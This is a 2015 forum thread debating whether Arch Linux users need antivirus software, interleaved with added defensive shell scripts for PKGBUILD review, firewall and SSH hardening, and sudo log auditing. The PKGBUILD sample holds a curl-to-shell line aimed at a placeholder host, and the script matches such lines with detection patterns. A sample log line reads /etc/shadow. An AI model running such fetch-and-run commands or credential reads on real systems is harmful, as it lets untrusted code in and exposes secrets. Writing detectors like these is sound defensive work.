Arch Linux and anti malware?

Discussion in 'all things UNIX' started by zakazak, Aug 4, 2015.

  1. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    Hey there,

    I am about to make a semi-switch from Windows to Arch Linux (dual boot for now) and wonder what kind of anti-malware / anti-exploit / anti-virus solutions and products are available on Linux?

    Don't tell me linux is malware free and doesn't need that kind of stuff, it is a waste of lies :p

    So far I thought about Sophos as AV. But in general it seems like the AV technology is miles behind the solutions/products that are available on Windows?

    Thanks
     
  2. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    OMG. Not another one of these threads.

    You don't need an Antivirus or antimalware or anti-exploit or anti-this and anti-that. It's as simple as that. A good Firewall setup is enough, considering you keep up with security updates; which in Arch's case, you need to regularly update your system.

    In Linux you don't need to rely on a company with a mere 200 employees to find bugs so they can patch them, you're constantly getting security updates, hundreds of thousands of people are trying to exploit it and since the source code is open there are more bugs discovered. On Windows you get updates usually once a month; in Linux it can be dozens a day. Just today I received an email from the Debian Security Team about how they've found and already patched a bug in WordPress, and this can go on 7 or 8 times a day.

    Just remember the basic Linux rules and you'll be fine:
    • Use trusted repositories;
    • Keep your system up-to-date;
    • Set up a Firewall;
    • Don't use your root account, and if possible don't put your account into 'sudo' or 'wheel' group;
    • If you install something from the AUR, read the PKGBUILD first;
    • Don't open "FamousSingerNaked.deb";
    • Secure your browser (Firefox: NoScript + Disconnect + RequestPolicy);
    You don't need an antivirus on Linux. Period. They mostly detect WINDOWS malware. Oh, don't tell me that this is because of that youtuber who said he got malware on Arch? That guy clearly doesn't know what he talks about. Seriously, I don't want to bash on the guy, but once he throws that verbal diarrhea and nonsense into a public place and disables comments, someone has to talk about his attitude: http://www.linux.org/threads/matthew-moore-gets-a-virus-on-arch.8011/ Just read that thread and you'll know what I'm talking about. Read it in its entirety, please. And read this one too https://www.reddit.com/r/linux/comments/33s60i/mythbusting_linux_guy_says_he_proofs_that_his/

    He proved nothing. NOTHING. All his points were distorted from reality and from what the referred website said. He didn't get malware, for instance (read the threads I posted, it's too long for me to post here).

    What I do recommend is "rkhunter", a package to detect a whole lot of useful information.

    Also, why jump from Windows to Arch? You should start with something easier like Debian.
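    The "read the PKGBUILD first" rule above is easy to state and easy to skip. Here is an added example, not code from the thread or from any Arch tool, of a first-pass triage script that prints the lines in a PKGBUILD a reviewer should look at before running makepkg: sources pulled over plain HTTP or from an unpinned git URL, checksums set to SKIP, pipe-to-shell or base64/eval in the build functions, and writes outside $pkgdir. The sample PKGBUILD it runs on is constructed for the example (a hypothetical package "examplepkg" on the reserved host example.invalid), and it assumes the source=() and *sums=() arrays each fit on one line.

```sh
#!/bin/sh
# Added example, not from the thread: a first-pass triage of an AUR
# PKGBUILD before you build it. It does not replace reading the file;
# it prints the lines a reviewer should look at first.
# Assumption: source=() and *sums=() arrays fit on one line each
# (multi-line arrays, common in real PKGBUILDs, are not parsed here).

# Constructed sample for a hypothetical package "examplepkg". The host
# example.invalid is a reserved name that never resolves.
write_sample_pkgbuild() {
    f="$(mktemp)"
    cat > "$f" <<'EOF'
pkgname=examplepkg
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("http://example.invalid/examplepkg-1.0.tar.gz" "fix.patch")
sha256sums=('SKIP' 'SKIP')
build() {
    cd "$srcdir/$pkgname-$pkgver"
    curl -s http://example.invalid/setup.sh | sh
    make
}
package() {
    cd "$srcdir/$pkgname-$pkgver"
    make DESTDIR="$pkgdir" install
    install -Dm644 LICENSE "$pkgdir/usr/share/licenses/$pkgname/LICENSE"
}
EOF
    echo "$f"
}

RE_SUMS='^(md5|sha1|sha224|sha256|sha384|sha512|b2)sums=.*SKIP'
RE_FETCH='(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)|base64[[:space:]]+(-d|--decode)|(^|[[:space:]])eval[[:space:]]'
RE_WRITE='(^|[[:space:]])(cp|install|ln|mv|rm)[[:space:]][^#]*[[:space:]]/(etc|usr|bin|sbin|lib|home|root|boot)(/|[[:space:]]|$)'

# Prints one finding per line; the return value is the number of findings.
pkgbuild_findings() {
    f="$1"
    n=0
    # 1. Sources fetched over plain HTTP, or from git without a pinned commit/tag.
    for s in $(sed -n 's/^source=(\(.*\))/\1/p' "$f" | tr -d "\"'"); do
        case "$s" in
            http://*|git+http://*)
                echo "insecure transport: $s"; n=$((n + 1)) ;;
            git+https://*)
                case "$s" in
                    *'#commit='*|*'#tag='*) ;;
                    *) echo "unpinned git source: $s"; n=$((n + 1)) ;;
                esac ;;
        esac
    done
    # 2. Checksums set to SKIP: nothing verifies what makepkg downloaded.
    hits=$(grep -nE "$RE_SUMS" "$f" || true)
    if [ -n "$hits" ]; then
        echo "unverified checksums: $hits"; n=$((n + 1))
    fi
    # 3. Code pulled from the network or decoded at build time (pipe-to-shell, base64, eval).
    hits=$(grep -nE "$RE_FETCH" "$f" || true)
    if [ -n "$hits" ]; then
        echo "$hits" | sed 's/^/runtime code fetch or decode: line /'
        n=$((n + $(echo "$hits" | wc -l)))
    fi
    # 4. Writes to the live filesystem instead of under $pkgdir.
    hits=$(grep -nE "$RE_WRITE" "$f" | grep -v 'pkgdir' || true)
    if [ -n "$hits" ]; then
        echo "$hits" | sed 's/^/write outside pkgdir: line /'
        n=$((n + $(echo "$hits" | wc -l)))
    fi
    return "$n"
}

# Usage:  pkgbuild_findings /path/to/PKGBUILD; echo "findings: $?"
```

    On the constructed sample it reports three findings (the HTTP tarball, the SKIP checksums, and the curl-to-sh line) and returns 3; a clean PKGBUILD returns 0. A zero exit is not a verdict, only the signal that the obvious red flags are absent and you can move on to reading the build() and package() bodies yourself.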
     
  3. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    I am not talking about any youtuber or article or whatever. I am seeing the malware, pw stealers, exploit kits and trojans that you can buy for $15 on many forums/websites to infect Linux machines. There are even some that run on Windows AND Linux.

    So yes, anti malware is definitely needed.

    A firewall might block the internet connection but won't remove the malware or prevent it from executing in the first place.
     
  4. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    No, it's not. You need to literally exploit the system, and that means basically having open ports listening on the internet. On Windows you have many of those by default, and most are easily exploitable. On Arch no internet port is open because it doesn't have such services. And even if there were open ports you need to find vulnerabilities in them, and even IF you managed to do that (that's a HUGE *if*) you'd be locked into the user's /home folder and wouldn't have access to the system at all. So no, you don't need any of that crap. The malware can't get in, so you don't need to remove it.

    And let's say it did get in because you screwed your system: no file is marked as executable by default, you LITERALLY have to open its properties and mark "I WANT THIS FILE TO HAVE EXECUTABLE PERMISSIONS". And let's say you did that and managed to install malware on your own, you'd be using a non-privileged account which has only access to its own folders, you simply log out and then log in as root (via tty1) and remove the executable code from the user's /home folder. Done. And if you ran the program as root? Well, that is your fault. Not Linux's.
    And none of that would have happened if you didn't run the unknown program as root and used only trusted repositories. It all falls apart once YOU do something wrong.

    And if you still think you need these nonsense products, I invite anyone to exploit my Arch box, it doesn't have Sophos, or ClamAV, or Kaspersky, or COMODO, or Bitdefender, or SELinux or AppArmor..... Go ahead, my IP is (edited because I changed it) and the admins of this site know that (sub-router IP edited by amarildojr). Please, invade my Linux and tell what are the contents of the file "MALWARE" in my Desktop. I can even click on malicious links that would try to exploit my Firefox browser, so if you have one please send it over PM for me.
     
    Last edited: Aug 4, 2015
  5. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    Sorry, I don't want to discuss how secure you feel about your system. There are too many widespread opinions and experiences about this topic and I don't want to cause any troubles with you as well :)

    I would rather know how you made your system secure. I would also be willing to send you some links to where you can buy/get malware for Linux. Maybe they will give you test samples. All I want to say is that malware for Linux is out there. It is and can be undetectable, can be bound with other files and can also be spread via exploits. If that malware wasn't any good then the developers wouldn't be able to sell it and wouldn't keep those projects alive.

    But for now I am mostly interested in what kind of anti malware solutions are out there and if any of them are actually good.
     
  6. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    You're still spinning the same wheel =/

    I didn't make my Arch more secure than it already is. The only thing I do is have a custom Firewall setup, look at my signature.

    I wouldn't want that. Not only because it's unethical, but because Linux malware needs to be "set up" with physical access to the machine in the vast majority of cases, and it wouldn't spread like it does on Windows. It's pointless to infect a single Linux machine, and it's waaay harder to do so than it is on Windows.

    But you're the one so sure that it is easy to be infected on Linux, so much that you even created this thread and are telling us that it is easy to be infected. All I'm doing is making it easier for you to prove your point ;)

    Sure there are. They just don't spread, and you won't need Sophos or any other BS security product. I just demonstrated on my other post how you can be safe without them, and how the user screws his/her system because of ignorance.

    And you think some Windowsy security company is going to protect you in such case? Like I said, just follow the simple Linux rules and you'll be fine. You're the problem on security, and those products aren't the solution. Rather, they only drag knowledge away from you, and that's how they profit on Linux: a good portion of profit comes from users who don't know jack about Linux security, from users who just "feel safer" because they have a product that will detect 99.9999% of WINDOWS malware, etc.

    Even if you run viruses ON WINE you won't get results 99.99% of the time. That's right, there has been some study showing how malware isn't nearly as effective on Wine, the program that makes running most Windows software on Linux possible.
    So why bother having an AV? That's pointless.

    Not in trusted repositories. Again, it doesn't matter how secure the system is, if you run "FamousSingerNaked.deb" then YOU are the problem, not the system, and there is probably nothing one can do to protect against user ignorance. Just stick to the distro's repositories, they do a good job on securing packages.

    You seem to know what you're talking about, so I'm going to politely ask for proof of that happening right now.
     
    Last edited: Aug 4, 2015
  7. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    I am not saying that Windows is more secure. The security products that are available for Windows are more advanced than on Linux. That is for sure. So yes, malware can also be undetected on Windows (this is what you mainly pay for when buying malware: that it is still undetected and not reported to any of the AV companies out there). But that is where behaviour blockers, HIPS and FW come into the game.

    I am not sure how trusted repos work but you can bind malware to other files while faking e.g. the md5 hash (bind malware but keep the same orig md5 hash). So maybe there is a way but I really have no idea about that.

    Give me $200-$300 so I can buy myself access to some of the "known" exploit kits and set up a website for you :) No really, I am not going to prove anything. I have seen enough malware and ways to infect someone and I have seen even more people who claimed to be virus free for years while half their keys/passwords were already spread through the www.

    I agree that a FW is the most important thing (to block outgoing and incoming connections that try to either send away your data or access you from outside). And with typical usage (and maybe usage of e.g. NortonDNS with a malware blocklist) you SHOULD do just fine. But the possibility is there. And it is bigger than most would realize. An example is Mac OS X users who claim to be malware free until like every 1-2 years a new malware finally gets detected which has already infected a mass of people and sat on their system undetected for ages... Since 2006 I believe.
     
  8. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    Oooohhh, PLEASE do bind malware into known and verified repositories!! hahahaha, boy would I love to see that. I'm sure you can do that, right? I mean, you talk so much about it :D Yet you haven't proved any of your arguments so far hehehehe.
    Oh, now I see. You don't know what you're talking about :)

    Why would I do that? The burden of proof is on the hands of the person who makes a claim. I didn't claim I need security products on Linux and I didn't claim it is easy to do A or B or C. You are the one doing that, you're the one who should prove your claims. Not me.

    Then why make ridiculous claims?

    Yet all of those are either people who use Windows or people who don't follow the basic Linux guideline. Like I said, not even OpenBSD is going to protect a user who doesn't know how NOT to be the security problem.

    Sure. Not that one needs Norton on Linux, if they even make such product.

    You keep making claims that you can't prove.

    But Macs are known to be insecure and they actually need security products. Linux doesn't, especially considering Arch/Gentoo users :) In fact, I'm starting to wonder if Arch is right for you, or Linux at all.
     
    Last edited: Aug 4, 2015
  9. Kerodo

    Kerodo Registered Member

    Joined:
    Oct 5, 2004
    Posts:
    7,786
    Seems to be just another case of a user bringing their Windows mindset to Linux. I've seen it many times, and it's just not appropriate... Live and learn, right... ;)
     
  10. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    Yes, NortonDNS exists for Linux.. like for every other OS where you can set a DNS server.

    I see that you either don't understand what I am writing or you simply don't want to understand it. I believe it is the second one. So talking any further with you is pointless :/

    If anyone has recommendations for anti-malware apps on Linux please let me know.

    P.s. "ehehehhhehehhee" :D
     
  11. summerheat

    summerheat Registered Member

    Joined:
    May 16, 2015
    Posts:
    729
    I'm afraid it's you who doesn't understand, certainly not amarildojr. As kerodo rightly said: You're bringing your Windows mindset to Linux. You don't know how Linux works but you still claim that it's insecure without "anti-malware apps".
     
  12. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    Yes, looking at how much malware is available for Linux and its infection/success rate as well as how easy it is to get your hands on it, tells me that Linux needs security and hardening just as Windows does.

    But I agree that my knowledge of Linux isn't as much as I want it to be.

    I don't know how the myth is still alive that Linux can't get infected. There is so much data and so many malware vendors for Linux out there that prove it :S
     
  13. summerheat

    summerheat Registered Member

    Joined:
    May 16, 2015
    Posts:
    729
    Nobody says that Linux can't get infected. If you download something from a malicious website and execute it as root you can seriously damage your system. But why would you do that? In the official repositories you'll find trustworthy opensource applications for nearly every purpose (in most cases several alternatives).

    And yes, there is malware for Linux. But again, as long as you use packages from your distro's repositories that doesn't affect you at all. At risk are Linux servers: in most cases because they are carelessly configured (e.g. weak passwords) or they haven't been updated in ages ("don't change a running system").

    But Linux desktop systems are not at risk (unless you're doing something really stupid - see above). That said, I'm using AppArmor and protect several applications with Firejail. But not because I think that Linux desktop users are in danger. Rather, it's more of a feasibility study in order to see how a system can be made as secure as possible without making it unusable.
     
  14. J_L

    J_L Registered Member

    Joined:
    Nov 6, 2009
    Posts:
    8,516
    Use VirusTotal on stuff you download and install outside of trusted repositories. Simple as that. Oh and might as well install something like uBlock.

    I could say the same for Windows actually, just that the chance of being infected changes from 0.01% to 0.1%...

    And lastly, backup, backup, backup. Just don't open holes in the firewall.
     
  15. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    6,030
    Start with Debian stable (now jessie). The repositories are signed. Don't run any servers. If you must run SSH server for remote login, configure it (/etc/ssh/sshd_config) to disable login by root, and password-based login (so only key-based login is possible). Install iptables-persistent. Edit /etc/iptables/rules.v6 to drop everything. Edit /etc/iptables/rules.v4 to drop all incoming traffic by default, and then allow only established incoming, and loopback. There are many guides online with other tweaks to drop malformed packets faster.
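    The recipe in the post above (key-only, non-root SSH; iptables-persistent with a default-deny rules.v4 and a drop-everything rules.v6) is short enough to write down as files. The following is an added example, not mirimir's own configuration and not part of the thread: two functions that emit the rules in iptables-restore format, the sshd_config lines that close password login, and a small checker, sshd_hardened, that reads a config the way sshd does (first value of a keyword wins, comments ignored) and refuses configs that still allow root or password login. The helper names are mine; the checker assumes the plain "Keyword value" syntax and ignores Match blocks. One caveat the post does not mention is built in: PasswordAuthentication no alone is not enough when PAM is in use, because keyboard-interactive authentication can still prompt for a password, so ChallengeResponseAuthentication (KbdInteractiveAuthentication in newer OpenSSH) has to be off too.

```sh
#!/bin/sh
# Added example, not from the thread: the Debian hardening recipe as
# files you can inspect before applying.
# Assumptions: iptables-persistent reads /etc/iptables/rules.v4 and
# rules.v6 in iptables-restore format; sshd_setting/sshd_hardened are
# hypothetical helpers that read sshd_config the way sshd does (first
# value of a keyword wins, comments ignored; Match blocks and the
# "Key=value" form are not handled).

# IPv4: default DROP inbound, then allow loopback and replies to our own
# connections. The SSH line stays commented unless you run sshd remotely.
rules_v4() {
    cat <<'EOF'
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -m conntrack --ctstate INVALID -j DROP
# -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW -j ACCEPT
COMMIT
EOF
}

# IPv6: drop everything, as the post says. This also drops ::1 loopback;
# add "-A INPUT -i lo -j ACCEPT" if a local service needs it.
rules_v6() {
    cat <<'EOF'
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
COMMIT
EOF
}

# sshd_config lines that leave only key-based, non-root login.
# ChallengeResponseAuthentication (KbdInteractiveAuthentication in newer
# OpenSSH) must be off too, or PAM can still prompt for a password.
hardened_sshd_config() {
    cat <<'EOF'
PermitRootLogin no
PasswordAuthentication no
ChallengeResponseAuthentication no
PubkeyAuthentication yes
EOF
}

# Prints the value sshd will use for a keyword, or "default" if unset.
sshd_setting() {
    key=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    v=$(awk -v key="$key" '
        /^[[:space:]]*#/ || NF < 2 { next }
        tolower($1) == key { print $2; exit }' "$1")
    if [ -n "$v" ]; then printf '%s\n' "$v"; else printf 'default\n'; fi
}

# Returns 0 if the config enforces the recipe, 1 (with a reason) otherwise.
sshd_hardened() {
    f="$1"
    [ "$(sshd_setting "$f" PermitRootLogin)" = "no" ] ||
        { echo "PermitRootLogin is not 'no'"; return 1; }
    [ "$(sshd_setting "$f" PasswordAuthentication)" = "no" ] ||
        { echo "PasswordAuthentication is not 'no'"; return 1; }
    [ "$(sshd_setting "$f" ChallengeResponseAuthentication)" = "no" ] ||
    [ "$(sshd_setting "$f" KbdInteractiveAuthentication)" = "no" ] ||
        { echo "keyboard-interactive (PAM) password prompts still enabled"; return 1; }
    return 0
}

# To apply (as root):
#   rules_v4 > /etc/iptables/rules.v4; rules_v6 > /etc/iptables/rules.v6
#   iptables-restore --test < /etc/iptables/rules.v4      # syntax check only
#   sshd_hardened /etc/ssh/sshd_config && sshd -t && systemctl restart ssh
```

    Run sshd -t after editing and keep an existing session open until a fresh key-based login works; a typo in sshd_config on a remote box is the classic way to lock yourself out.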
     
  16. UnknownK

    UnknownK Registered Member

    Joined:
    Nov 3, 2012
    Posts:
    160
    Location:
    Unknown
    I can only give you some options which are available on Arch Linux for better security. You need to do some reading and choose if these fit your needs. Note that there are no anti-virus or anti-this/that tools available in Linux. Even if there is any, nobody is going to recommend those to you.

    AppArmor (optional)

    Firejail (optional) (do not download binaries from AUR; make packages using the PKGBUILD after you personally verify them and then install them)

    Grsecurity (optional)

    Uncomplicated Firewall

    NoScript

    uBlock/uBlock Origin

    Do not install non-free binaries like Flash (my recommendation)

    I don't think it will be easy for you to even install Arch Linux coming straight from Windows. You can try Manjaro to get a taste of Arch, and then when you become somewhat familiar with the basics you can install Arch Linux. If you are open to other distributions, better still, install Debian Stable.
     
  17. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    Like mine in my signature :p
     
  18. mirimir

    mirimir Registered Member

    Joined:
    Oct 1, 2011
    Posts:
    6,030
    Doh ;)

    Looks good :thumb:
     
  19. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    1,985
    Location:
    Canada
    @zakazak,

    you could open a terminal and type:
    yaourt antivirus (after installing yaourt)...


    ...which will give you several antivirus solutions to choose from if that's what you really want. My humble opinion is like the others, however, in that I seriously doubt you need one. You could run tremendously secure using Chromium with a good script blocking extension like uBlock or uMatrix and perhaps throw in HTTPS Everywhere as well. Even bolster it further by running it under Firejail and you can surf practically bulletproof.

    As an aside, a few handy commands I had to run to get more out of my Arch installation:

    $ sudo pacman -S base-devel

    $ sudo pacman -S fakeroot

    $ sudo pacman -Sy yaourt
     
  20. zakazak

    zakazak Registered Member

    Joined:
    Sep 20, 2010
    Posts:
    523
    Thanks for that, now that you mentioned it: I think Firefox is the smart choice when it comes to privacy and security. I recently read that Chromium still has "unwanted network activity" running in the background?
     
  21. UnknownK

    UnknownK Registered Member

    Joined:
    Nov 3, 2012
    Posts:
    160
    Location:
    Unknown
    Can you elaborate more on this; why this is not secure and what is the best practice.
     
  22. amarildojr

    amarildojr Registered Member

    Joined:
    Aug 8, 2013
    Posts:
    1,989
    Location:
    Brasil
    The purpose of this non-administrative account is to, well, not have administrative privileges. If this account is compromised and the attacker gets hold of the user's password, he/she could easily "sudo" his/her way around the system. If the user isn't in the "sudo" or "wheel" group the attack surface will only be the user's /home folder. This is the default practice on Debian, for instance, and what I've been doing since my last Arch install. Whenever I need root privileges I just "su -" and do whatever I need to do. Then after, just "exit" out of it.
     
    Last edited: Aug 5, 2015
  23. UnknownK

    UnknownK Registered Member

    Joined:
    Nov 3, 2012
    Posts:
    160
    Location:
    Unknown
    I just don't see how having a root account to do administrative tasks is more secure than having sudo. How is someone going to get hold of the user's password? Using a keylogger? Then what's stopping him from getting the root's password? The username is root, it just has to log the phrase after "su -". In the case of sudo there are certain other advantages, like it times out after some time interval; in su you have to log out manually. With sudo, it is also possible to have an audit trail of the successful/unsuccessful access attempts. You can later find out who did what with sudo, not possible with su I think.

    Not really, because if you leave the root password blank, Debian will disable the root account and will automatically install sudo and add the user to group sudo.
     
    Last edited: Aug 5, 2015
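    The two posts above disagree on sudo versus "su -", and part of the disagreement is about what ends up in the logs. Below is an added example, not code from either poster, that makes the difference concrete: one helper lists who can escalate at all (members of wheel on Arch, sudo on Debian, read from /etc/group), and another walks an auth log and prints one line per escalation event. sudo logs the invoking user, the outcome (success, "user NOT in sudoers", wrong password) and the exact command; su, through PAM, logs that a root session was opened for a user but nothing about what ran inside it. The group file excerpt and the log lines are constructed for the example (host "archbox", users alice/bob/carol/dave and the PID are fictional); the line formats follow what sudo and pam_unix write to syslog. The function names are mine.

```sh
#!/bin/sh
# Added example, not from the thread: what the audit trail of sudo versus
# su actually records, over constructed log lines, plus a check of who
# can escalate at all. The /etc/group excerpt and auth log lines below are
# made up for the example (host, users and PID are fictional); the line
# formats follow what sudo and pam_unix write to syslog.

write_sample_group() {
    f="$(mktemp)"
    cat > "$f" <<'EOF'
root:x:0:
wheel:x:998:alice
sudo:x:27:bob,carol
users:x:100:alice,bob,carol,dave
EOF
    echo "$f"
}

write_sample_authlog() {
    f="$(mktemp)"
    cat > "$f" <<'EOF'
Aug  5 10:12:01 archbox sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/pacman -Syu
Aug  5 10:13:44 archbox sudo:      bob : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/cat /etc/shadow
Aug  5 10:15:09 archbox sudo:    alice : 3 incorrect password attempts ; TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/bash
Aug  5 10:16:30 archbox su: (to root) alice on pts/0
Aug  5 10:16:31 archbox su[1234]: pam_unix(su-l:session): session opened for user root by alice(uid=1000)
EOF
    echo "$f"
}

# Every member of the groups a stock sudoers grants (wheel on Arch, sudo on Debian).
escalation_members() {
    awk -F: '$1 == "wheel" || $1 == "sudo" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
    }' "$1" | sort -u
}

# One line per escalation event: user|outcome|command.
# sudo records the command on success and on failure; su only records
# that a root session was opened, never what was run inside it.
escalation_trail() {
    awk '
        / sudo(\[[0-9]+\])?: / {
            sub(/^.* sudo(\[[0-9]+\])?: +/, "")
            split($0, p, " : ")          # p[1]=user, p[2]=rest of the record
            split(p[2], q, " ; ")        # q[1] is "TTY=..." on success, else the reason
            user = p[1]; gsub(/ /, "", user)
            outcome = (q[1] ~ /^TTY=/) ? "ok" : q[1]
            cmd = ""
            if (match($0, /COMMAND=.*/)) cmd = substr($0, RSTART + 8)
            print user "|" outcome "|" cmd
            next
        }
        / su(\[[0-9]+\])?: \(to / {
            sub(/^.* su(\[[0-9]+\])?: \(to /, "")   # leaves "root) alice on pts/0"
            split($0, a, " ")
            target = substr(a[1], 1, length(a[1]) - 1)
            print a[2] "|su to " target "|(no command recorded)"
        }' "$1"
}

# Usage:  escalation_members /etc/group
#         escalation_trail /var/log/auth.log
#         journalctl -t sudo -t su --no-pager | escalation_trail /dev/stdin   # systemd journal
```

    On the constructed log this yields four events: alice's successful pacman run, bob's refused attempt on /etc/shadow (refused, but still logged with the command), alice's failed password attempts for a root shell, and alice's su to root with no command attached. The last line is the practical difference between the two approaches when you later need to reconstruct what happened on the box.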
  24. summerheat

    summerheat Registered Member

    Joined:
    May 16, 2015
    Posts:
    729
    I agree. BTW, using sudo instead of su is also what the Arch Linux wiki recommends.
     
  25. Trespasser

    Trespasser Registered Member

    Joined:
    Mar 1, 2005
    Posts:
    1,194
    Location:
    Virginia - Appalachian Mtns
    Hi Kerodo,
    Yeah, I had the same mindset when I first switched to Linux some 10 years ago. And like the original poster, one of the first things I started seeking was an anti-malware application...thinking it was only logical that I needed one.

    Still brings a chuckle to me when I read these types of posts, though.

    Bob
     